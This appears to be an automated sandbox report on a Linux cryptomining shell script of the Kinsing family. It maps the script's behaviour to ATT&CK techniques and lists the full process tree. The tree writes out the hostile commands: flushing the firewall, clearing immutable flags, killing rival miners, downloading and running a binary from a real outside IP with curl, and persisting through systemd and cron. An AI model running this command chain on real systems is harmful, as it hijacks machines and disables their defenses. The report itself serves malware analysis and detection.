78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

execution persistence privilege_escalatio

description	ioc	Process
File opened for modification	/etc/ld.so.preload	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
956	chmod
967	chmod
968	chmod
923	chmod
936	chmod
948	chmod
960	chmod
901	chmod
909	chmod
916	chmod

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
732	iptables

Attempts to change immutable files 21 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
783	xargs
826	xargs
828	xargs
893	xargs
770	xargs
776	xargs
842	xargs
849	xargs
863	xargs
874	xargs
887	xargs
728	chattr
754	xargs
719	chattr
824	xargs
816	xargs
818	xargs
820	xargs
822	xargs
726	chattr
764	xargs

Creates/modifies Cron job 1 TTPs 50 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

persistence privilege_escalation

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.Atk6eu	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Tww0yg	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.oAWyMn	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.KGO7vp	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.rQZUvx	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.C8yYex	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.UeztWL	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.vdUyUs	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Px4nKG	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Y8SXF7	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Qo7koh	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.bnTwy0	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.LH4olH	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.6H0B3b	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.jIwe9t	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.jjbLRp	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.qFum0W	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.QTyz4r	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.j4tRER	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.2bKUky	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.zvIIUJ	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.S4rlQf	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Yv6c3g	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Y4uzyu	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.h5kvXZ	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.jaCQGH	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.8BDRze	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.rj2vN1	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.06axD8	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.gfX3hk	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.TgSu7Z	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.wrN691	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.y11aPH	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.bXABnB	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.4dFBLk	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.R7Yr4Y	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.P9wgRi	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.12pGNh	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.0YEqtd	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.UzxVQZ	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.QHJlNU	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.koBKdN	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.TAsMn7	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.uDFNoJ	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.D0MP3k	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.9jz8Q7	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.v0JFPb	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.HRKEqf	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.NlDOKb	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.udUgqm	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/bot.service	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

Reads CPU attributes 1 TTPs 44 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 5 IoCs

Adversaries may try to discover information about running processes.

Process Discovery

T1057

pid	Process
750	ps
812	ps
838	ps
845	ps
889	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/164/status	pkill
File opened for reading	/proc/710/cmdline	pkill
File opened for reading	/proc/105/cmdline	ps
File opened for reading	/proc/4/status	pkill
File opened for reading	/proc/385/cmdline	pkill
File opened for reading	/proc/402/cmdline	pkill
File opened for reading	/proc/688/status	pkill
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/688/cmdline	pkill
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/77/status	pkill
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/889/cmdline	ps
File opened for reading	/proc/756/status	pkill
File opened for reading	/proc/810/status	pkill
File opened for reading	/proc/527/status	pkill
File opened for reading	/proc/74/status	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/366/cmdline	pkill
File opened for reading	/proc/245/cmdline	pkill
File opened for reading	/proc/340/cmdline	pkill
File opened for reading	/proc/386/cmdline	pkill
File opened for reading	/proc/74/cmdline	pkill
File opened for reading	/proc/16/status	pkill
File opened for reading	/proc/73/status	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/365/cmdline	pkill
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/245/cmdline	ps
File opened for reading	/proc/703/cmdline	pkill
File opened for reading	/proc/79/cmdline	pkill
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/143/status	pkill
File opened for reading	/proc/22/status	ps
File opened for reading	/proc/37/cmdline	pkill
File opened for reading	/proc/365/status	pkill
File opened for reading	/proc/37/status	pkill
File opened for reading	/proc/164/cmdline	pkill
File opened for reading	/proc/336/cmdline	ps
File opened for reading	/proc/710/status	pkill
File opened for reading	/proc/37/status	pkill
File opened for reading	/proc/73/cmdline	ps
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/18/cmdline	pkill
File opened for reading	/proc/82/cmdline	pkill
File opened for reading	/proc/718/status	ps
File opened for reading	/proc/70/status	pkill
File opened for reading	/proc/11/status	pkill
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/340/cmdline	pkill
File opened for reading	/proc/708/status	ps
File opened for reading	/proc/13/cmdline	pkill
File opened for reading	/proc/19/cmdline	pkill
File opened for reading	/proc/367/status	pkill
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/143/cmdline	pkill
File opened for reading	/proc/72/status	ps
File opened for reading	/proc/385/status	ps
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/16/cmdline	pkill
File opened for reading	/proc/143/status	pkill
File opened for reading	/proc/24/cmdline	pkill

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

System Network Configuration Discovery

T1016

pid	Process
715	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
1097	sed

/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
1⤵
- Modifies the dynamic linker configuration file
- Modifies systemd
- System Network Configuration Discovery
PID:715
- /usr/bin/chattr
  chattr -i /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:719
- /bin/rm
  rm -f /etc/ld.so.preload
  2⤵
  PID:724
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:726
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:728
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:732
- /usr/bin/id
  id -u
  2⤵
  PID:743
- /bin/ls
  ls -la /etc
  2⤵
  PID:746
- /bin/grep
  grep -e /dev
  2⤵
  PID:747
- /bin/grep
  grep -v grep
  2⤵
  PID:748
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:750
- /bin/grep
  grep agetty
  2⤵
  PID:751
- /bin/grep
  grep -v grep
  2⤵
  PID:752
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:754
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:753
- /usr/bin/pkill
  pkill -f 42.112.28.216
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:757
- /bin/grep
  grep 207.38.87.6
  2⤵
  PID:760
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:761
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:762
- /bin/grep
  grep -v -
  2⤵
  PID:763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:764
- /bin/grep
  grep 127.0.0.1:52018
  2⤵
  PID:766
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:767
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:768
- /bin/grep
  grep -v -
  2⤵
  PID:769
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:770
- /bin/grep
  grep 34.81.218.76:9486
  2⤵
  PID:772
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:773
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:774
- /bin/grep
  grep -v -
  2⤵
  PID:775
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:776
- /bin/grep
  grep 42.112.28.216:9486
  2⤵
  PID:779
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:780
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:781
- /bin/grep
  grep -v -
  2⤵
  PID:782
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:783
- /usr/bin/pkill
  pkill -f .git/kthreaddw
  2⤵
  - Reads CPU attributes
  PID:784
- /usr/bin/pkill
  pkill -f 80.211.206.105
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:785
- /usr/bin/pkill
  pkill -f 207.38.87.6
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:786
- /usr/bin/pkill
  pkill -f p8444
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:787
- /usr/bin/pkill
  pkill -f supportxmr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:788
- /usr/bin/pkill
  pkill -f monero
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:789
- /usr/bin/pkill
  pkill -f kthreaddi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:790
- /usr/bin/pkill
  pkill -f srv00
  2⤵
  - Reads CPU attributes
  PID:791
- /usr/bin/pkill
  pkill -f /tmp/.javae/javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:792
- /usr/bin/pkill
  pkill -f .javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:793
- /usr/bin/pkill
  pkill -f .syna
  2⤵
  - Reads CPU attributes
  PID:794
- /usr/bin/pkill
  pkill -f .main
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:795
- /usr/bin/pkill
  pkill -f xmm
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:796
- /usr/bin/pkill
  pkill -f solr.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:797
- /usr/bin/pkill
  pkill -f /tmp/.solr/solrd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:798
- /usr/bin/pkill
  pkill -f /tmp/javac
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:799
- /usr/bin/pkill
  pkill -f /tmp/.go.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:800
- /usr/bin/pkill
  pkill -f /tmp/.x/agetty
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:801
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  PID:802
- /usr/bin/pkill
  pkill -f c3pool
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:803
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/gitag-ssh
  2⤵
  - Reads CPU attributes
  PID:804
- /usr/bin/pkill
  pkill -f /tmp/1
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:805
- /usr/bin/pkill
  pkill -f /tmp/okk.sh
  2⤵
  - Reads CPU attributes
  PID:806
- /usr/bin/pkill
  pkill -f /tmp/gitaly
  2⤵
  - Reads CPU attributes
  PID:807
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:808
- /usr/bin/pkill
  pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  2⤵
  - Reads CPU attributes
  PID:809
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/supervise
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:810
- /usr/bin/pkill
  pkill -f /tmp/.ssh/redis.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:811
- /bin/grep
  grep -v grep
  2⤵
  PID:814
- /bin/grep
  grep ./udp
  2⤵
  PID:813
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:812
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:816
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:815
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:818
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:817
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:820
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:819
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:821
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:822
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:824
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:823
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:826
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:825
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:828
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:827
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  PID:829
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:830
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:831
- /usr/bin/pkill
  pkill -f cruner
  2⤵
  - Reads CPU attributes
  PID:832
- /usr/bin/pkill
  pkill -f dbused
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:833
- /usr/bin/pkill
  pkill -f bashirc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:834
- /usr/bin/pkill
  pkill -f meminitsrv
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:837
- /bin/grep
  grep ./oka
  2⤵
  PID:839
- /bin/grep
  grep -v grep
  2⤵
  PID:840
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:838
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:841
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:842
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:846
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:845
- /bin/grep
  grep -v grep
  2⤵
  PID:847
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:848
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:849
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:851
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:852
- /bin/grep
  grep -v bin
  2⤵
  PID:854
- /bin/grep
  grep -v "\\["
  2⤵
  PID:855
- /bin/grep
  grep -v "("
  2⤵
  PID:856
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:857
- /bin/grep
  grep -v proxymap
  2⤵
  PID:858
- /bin/grep
  grep -v postgres
  2⤵
  PID:859
- /bin/grep
  grep -v postgrey
  2⤵
  PID:860
- /bin/grep
  grep -v kinsing
  2⤵
  PID:861
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:862
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:863
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:864
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:865
- /bin/grep
  grep -v bin
  2⤵
  PID:866
- /bin/grep
  grep -v "\\["
  2⤵
  PID:867
- /bin/grep
  grep -v "("
  2⤵
  PID:868
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:869
- /bin/grep
  grep -v proxymap
  2⤵
  PID:870
- /bin/grep
  grep -v postgres
  2⤵
  PID:871
- /bin/grep
  grep -v postgrey
  2⤵
  PID:872
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:874
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:878
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:877
- /bin/grep
  grep -v bin
  2⤵
  PID:879
- /bin/grep
  grep -v "\\["
  2⤵
  PID:880
- /bin/grep
  grep -v "("
  2⤵
  PID:881
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:882
- /bin/grep
  grep -v proxymap
  2⤵
  PID:883
- /bin/grep
  grep -v postgres
  2⤵
  PID:884
- /bin/grep
  grep -v postgrey
  2⤵
  PID:885
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:886
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:887
- /bin/grep
  grep -v grep
  2⤵
  PID:890
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:889
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:891
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:892
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:893
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:898
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:899
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /usr/bin/curl
  curl -o /etc/kinsing http://80.71.158.12/kinsing
  2⤵
  PID:903
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:913
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:914
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /usr/bin/curl
  curl -o /etc/kinsing http://80.71.158.12/kinsing
  2⤵
  PID:918
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:927
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:928
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:933
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:934
- /bin/chmod
  chmod 777 /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /usr/bin/curl
  curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
  2⤵
  PID:938
- /bin/chmod
  chmod +x /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:948
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:952
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:953
- /bin/chmod
  chmod 777 /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:956
- /usr/bin/curl
  curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
  2⤵
  PID:958
- /bin/chmod
  chmod +x /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:963
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:964
- /bin/rm
  rm -rf /tmp/kdevtmpfsi
  2⤵
  PID:966
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:967
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /etc/kinsing
  /etc/kinsing
  2⤵
  PID:969
- /usr/bin/id
  id -u
  2⤵
  PID:970
- /bin/systemctl
  systemctl enable bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:971
- /bin/systemctl
  systemctl start bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:983
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:987
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:985
- /bin/sed
  sed /base64/d
  2⤵
  PID:986
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:988
- /bin/sed
  sed /_cron/d
  2⤵
  PID:989
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:990
- /bin/sed
  sed /31.210.20.181/d
  2⤵
  PID:992
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:991
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:993
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:994
- /bin/sed
  sed /update.sh/d
  2⤵
  PID:995
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:996
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:997
- /bin/sed
  sed /logo4/d
  2⤵
  PID:998
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:999
- /bin/sed
  sed /logo9/d
  2⤵
  PID:1001
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1000
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1002
- /bin/sed
  sed /logo0/d
  2⤵
  PID:1004
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1003
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1005
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1006
- /bin/sed
  sed /logo/d
  2⤵
  PID:1007
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1008
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1009
- /bin/sed
  sed /tor2web/d
  2⤵
  PID:1010
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1011
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1012
- /bin/sed
  sed /jpg/d
  2⤵
  PID:1013
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1014
- /bin/sed
  sed /png/d
  2⤵
  PID:1016
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1015
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1017
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1018
- /bin/sed
  sed /tmp/d
  2⤵
  PID:1019
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1020
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1023
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1025
- /bin/sed
  sed /zmreplchkr/d
  2⤵
  PID:1024
- /bin/sed
  sed /aliyun.one/d
  2⤵
  PID:1029
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1027
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1030
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1033
- /bin/sed
  sed /3.215.110.66.one/d
  2⤵
  PID:1034
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1035
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1038
- /bin/sed
  sed /pastebin/d
  2⤵
  PID:1039
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1040
- /bin/sed
  sed /onion/d
  2⤵
  PID:1045
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1044
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1046
- /bin/sed
  sed /lsd.systemten.org/d
  2⤵
  PID:1051
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1050
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
